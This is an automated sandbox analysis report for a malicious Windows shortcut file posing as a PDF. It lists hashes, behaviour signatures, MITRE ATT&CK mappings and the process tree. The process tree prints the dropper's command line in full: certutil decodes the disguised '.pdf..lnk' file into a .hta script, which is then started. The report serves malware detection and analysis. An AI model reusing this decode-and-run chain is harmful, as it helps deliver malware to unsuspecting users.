11a16f65bc93892eb674e05389f126eb10b8f5502998aa24b5c1984b415f9d18

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19/11/2024, 13:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

11a16f65bc93892eb674e05389f126eb10b8f5502998aa24b5c1984b415f9d18.lnk
Size

292.5MB
MD5

725f2f61dadde4dd4ea0c4ad8666cd2a
SHA1

5b87ffd40088e98e37d889ed0ca08ff237440a1b
SHA256

11a16f65bc93892eb674e05389f126eb10b8f5502998aa24b5c1984b415f9d18
SHA512

611d66b543d7a86b98778b99db429b3998afa9f4b0a7b744f5ec1fb3e3180653fe13e0ef6f8d75e09e7309f6aac0a9aa76a6c27486b0ad836fd98e24c5b5e977
SSDEEP

12288:4kz23N5x1aD1vsNcccVFpZxhASzeql05TjeKR3ePe/:/65x1aRi3CfPvl0FjeHm/

Score

7^/10

defense_evasion

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	cmd.exe

Deobfuscate/Decode Files or Information 1 TTPs 2 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
1472	cmd.exe
5044	certutil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4416 wrote to memory of 1472	4416	cmd.exe	87
PID 4416 wrote to memory of 1472	4416	cmd.exe	87
PID 1472 wrote to memory of 5044	1472	cmd.exe	88
PID 1472 wrote to memory of 5044	1472	cmd.exe	88

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\11a16f65bc93892eb674e05389f126eb10b8f5502998aa24b5c1984b415f9d18.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c if exist C:\Users\Admin\AppData\Local\Temp\temp1_CC3USWBBB.zip\CCBBB3US-W7YTK.pdf..lnk (certutil.exe -decode C:\Users\Admin\AppData\Local\Temp\temp1_CC3USWBBB.zip\CCBBB3US-W7YTK.pdf..lnk C:\Users\Admin\AppData\Local\Temp\.hta&start C:\Users\Admin\AppData\Local\Temp\.hta)else (certutil -decode CCBBB3US-W7YTK.pdf..lnk C:\Users\Admin\AppData\Local\Temp\.hta&start C:\Users\Admin\AppData\Local\Temp\.hta)
  2⤵
  - Deobfuscate/Decode Files or Information
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\system32\certutil.exe
    certutil -decode CCBBB3US-W7YTK.pdf..lnk C:\Users\Admin\AppData\Local\Temp\.hta
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:5044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads